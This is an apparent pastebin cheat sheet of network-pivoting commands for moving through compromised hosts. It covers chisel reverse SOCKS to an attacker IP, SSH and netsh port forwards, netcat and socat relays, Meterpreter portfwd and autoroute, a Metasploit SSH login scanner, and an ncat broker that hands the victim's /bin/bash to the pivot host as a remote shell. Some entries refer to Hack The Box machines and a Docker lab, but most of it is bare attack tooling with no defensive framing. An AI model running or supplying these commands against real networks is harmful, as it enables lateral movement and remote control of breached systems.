PIVOTING

SUBMITTED BY: DevilDawg

DATE: Feb. 24, 2022, 4:07 a.m.

FORMAT: Text only

SIZE: 7.9 kB

Raw Download

HITS: 837

Report
  1. PIVOTING:
  3. Pivot
  5. Chisel :
  7. ################################# Attacker Machine ########################
  8. ./chisel server -p 8080 --reverse
  9. #################################### Pivot Machine ########################
  10. chisel.exe client attacker_ip:8080 R:socks
  11. ############################### Proxychains.conf ##########################
  12. socks5 127.0.0.1 1080 1112
  13. ################################## Nmap Scan ##############################
  14. Always better to transfer binaries and scan from the pivot
  15. nmap.exe -sC -sV 10.10.10.10 -Pn -T5 // From Pivot machine
  16. proxychains nmap 10.10.10.10 -T5 -Pn -sT // From Kali Machine
  17. ################################### Gobuster ##############################
  18. gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/direct
  23. Pivot via SSH key (HTB Nibbles)
  25. ssh -i root.key -L9000:web_ip:port ssh_ip
  26. Ex : ssh -i root.key -L9000:10.10.10.75:80 10.10.10.73
  31. Pivot via root password (HTB Sense)
  33. ssh -D1080 pivot_ip
  34. Burp -> user options -> socks proxy -> use socks proxy
  35. vi /etc/proxychains.conf
  36. Change socks4(metasploit) to socks5(ssh)
  37. proxychains curl -k https://10.10.10.60 [ -k to ignore SSL]
  44. netsh Port Proxy:
  45. pivot c:\> netsh interface
  46. portproxy add v4tov4
  47. listenport=4000
  48. listenaddress=0.0.0.0
  49. connectport=22
  50. connectaddress=victim.tgt
  51. attacker $ ssh
  52. victimadmin@pivot.tgt
  58. SSH trail through Linux:
  59. attacker $ ssh
  60. pivotAdmin@pivot.tgt
  61. pivot $ ssh
  62. victimAdmin@victim.tgt
  68. PowerShell sessions through Windows:
  69. attacker PS C:\> EnterPsSession –ComputerName
  70. pivot.tgt
  71. Or RDP session over Windows:
  72. attacker c:\> mstsc.exe
  73. /v:Pivot.tgt
  74. psexec.exe
  75. Now, with command execution on pivot:
  76. pivot C:\> ssh
  77. victimadmin@victim.tgt
  78. No SSH available? How about PuTTY?
  85. SSH Pivots Require an sshd Setting:
  86. Set GatewayPorts yes in
  87. /etc/ssh/sshd_config, then:
  88. pivot # systemctl restart sshd
  93. attacker $ ssh -fNL
  94. 1337:victim.tgt:22
  95. pivoter@pivot.tgt
  96. attacker $ ssh
  97. victimadmin@localhost -P 1337
  103. SSH Local Port Forward
  104. attacker $ ssh -fNR
  105. 4000:victim.tgt:22
  106. pivoter@pivot.tgt
  107. attacker $ ssh
  108. victimadmin@pivot.tgt -P 4000
  116. ProxyChains:
  117. attacker $ ssh
  118. pivotadmin@pivot.tgt -D 9050 -fN
  123. Proxychains:
  124. attacker $ proxychains ssh
  125. victimadmin@victim.tgt
  126. And check /etc/proxychains.conf
  131. Some SSH Command Line Options:
  132. -f put ssh in the background after connecting
  133. -N don’t execute a command; just forward some ports
  134. -P num use “num” port for ssh
  139. Netcat Port Forward:
  140. pivot $ cd /tmp && mknod
  141. backpipe p
  142. pivot $ nc -lvp 4000
  143. 0<backpipe | nc -v victim.tgt
  144. 22 1>backpipe
  145. attacker $ ssh
  146. victimadmin@pivot.tgt -P 4000
  149. Meterpreter Port Forward:
  150. pivot Meterpreter > portfwd
  151. add –l 4000 –p 22 –r
  152. victim.tgt
  153. attacker $ ssh
  154. victimadmin@pivot.tgt -P 4000
  160. Metasploit/Meterpreter Autoroute:
  161. pivot Meterpreter > run
  162. post/multi/manage/autoroute
  163. SUBNET=pivotSubnet CMD=add
  164. pivot Meterpreter > background
  165. pivot msf > use
  166. scanner/ssh/ssh_login
  167. pivot msf > set RHOSTS
  168. victim.tgt
  169. pivot msf > set USERNAME
  170. victimAdmin
  171. pivot msf > set PASSWORD
  172. victimPass
  173. pivot msf > run
  180. Socat Port Forward:
  181. pivot $ socat TCPLISTEN:4000,fork
  182. TCP:victim.tgt:22
  183. attacker $ ssh
  184. victimadmin@pivot.tgt -P 4000
  190. Ncat Connection Brokering:
  191. Assumes code execution on victim
  192. pivot$ ncat -vlp 4000 --broker
  193. victim$ ncat pivot.tgt 4000 -e
  194. /bin/bash
  195. attacker$ ncat pivot.tgt 4000
  203. Method 1: Pivot with SSH & ProxyChains
  204. This method leverages SSH with dynamic port forwarding to create a socks proxy, with proxychains to help with tools that can't use socks proxies.
  208. Setting up the tunnel
  209. First login with SSH using dynamic port forwarding.
  210. ssh -D localhost:9000 -f -N pentester@localhost -p 20022
  214. Setup ProxyChains
  215. in /etc/proxychains4.conf, add the following to the end of the file:
  216. socks5 127.0.0.1 9000
  220. $ proxychains nmap -sV webgoat
  226. Method 2: Pivot With Meterpreter and socks proxy
  227. Setup the connection and run a socks proxy over meterpreter:
  228. docker exec -it pivots_metasploit_1 /bin/bash
  230. $ proxychains nmap -sT -P0 -p8080,9001 172.20.0.3
  236. Method 3: Pivot over a Ncat or Netcat relay
  237. Tunnel as http proxy with ncat
  240. ## Target machine - setup ncat listener
  241. ncat -vv --listen 3128 --proxy-type http
  245. ## attacker machine (metasploit)
  246. $ tail /etc/proxychains.conf -n 3
  248. proxychains nmap -sT -P0 -p8080,9001 172.20.0.2
  253. Reverse tunnel a single port with ncat
  255. # On attacker / metasploit machine
  256. $ docker exec -it pivots_metasploit_1 /bin/bash
  258. $ ncat -lv --broker -m2 8080
  264. # On ssh / box to pivot from
  265. $ ssh pentester@localhost -p 20022
  266. ncat -v metasploit 8080 -c "ncat -v webgoatlocal 8080"
  271. Tunnel with netcat:
  272. # Make backpipe to pass data around
  273. mknod pivot p
  274. # Setup the listener on pivot machine - forward traffic the
  275. # pivot machine receives on port 8080 to the webgoat server
  276. # port 8080
  277. nc -l -p 8080 0<pivot | nc webgoatlocal 8080 1>pivot
  281. ## On attacker machine (metasploit)
  282. root@12f888991729:/$ wget ssh:8080/WebGoat
  283. Saving to: ‘WebGoat'
  288. Method: Installing tools on the target machine:
  293. SSH pivot
  294. ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>
  300. Metasploit with Meterpreter
  301. msf5 >route add <network_to_proxy_in_CIDR_notation> <meterpreter_session_id>
  302. [*] Route added
  303. msf5 > use auxiliary/server/socks4a
  304. msf5 auxiliary(server/socks4a) > set SRVPORT 9050
  305. SRVPORT => 9050
  306. msf5 auxiliary(server/socks4a) > run -j
  312. Ncat HTTP proxy
  313. $ ncat -vv --listen 3128 --proxy-type http
  315. Ncat Port Forwarder
  317. On attacker machine:
  318. $ ncat -lv --broker -m2 <port>
  320. On pivot machine:
  321. $ ncat -v <attacker_ip> <attacker_port> -c "ncat -v <host_to_pivot_to> <port_on_final_target"
  327. Netcat Port Forwarder
  329. On pivot machine:
  330. mknod pivot p
  331. nc -l -p <port_to_listen_on> 0<pivot | nc <ip_to_pivot_to> <port_to_pivot_to> 1>pivot
  336. Proxychains Setup
  338. Install and configure proxychains
  339. tail /etc/proxychains.conf
  340. #socks4 127.0.0.1 9050
  341. http 172.21.0.3 3128
  342. #<type: http/socks4/socks5> <proxy_host> <proxy_port>
  347. Dynamic SSH Pivoting Command using proxy chains
  348. ssh -D 127.0.0.1:9050 root@192.168.2.2
  352. Meterpreter Pivoting Cheatsheet:
  354. portfwd add –l 3389 –p 3389 –r target-host Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
  356. portfwd delete –l 3389 –p 3389 –r target-host Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
  358. portfwd flush Meterpreter delete all port forwards
  360. portfwd list Meterpreter list active port forwards
  362. run autoroute -s 192.168.15.0/24 Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
  364. run autoroute -p Meterpreter list all active routes
  366. route Meterpreter view available networks the compromised host can access
  368. route add 192.168.14.0 255.255.255.0 3 Meterpreter add route for 192.168.14.0/24 via Session 3.
  370. route delete 192.168.14.0 255.255.255.0 3 Meterpreter delete route for 192.168.14.0/24 via Session 3.
  372. route flush Meterpreter delete all routes
  375. In order to connect to the compromised machine you would run:
  377. Connect to RDP via Meterpreter Port Forward
  378. rdesktop 127.0.0.1
  382. SSH Pivoting using Proxychains
  384. Dynamic SSH Pivoting Command using proxy chains
  385. ssh -D 127.0.0.1:9050 root@192.168.2.2
comments powered by Disqus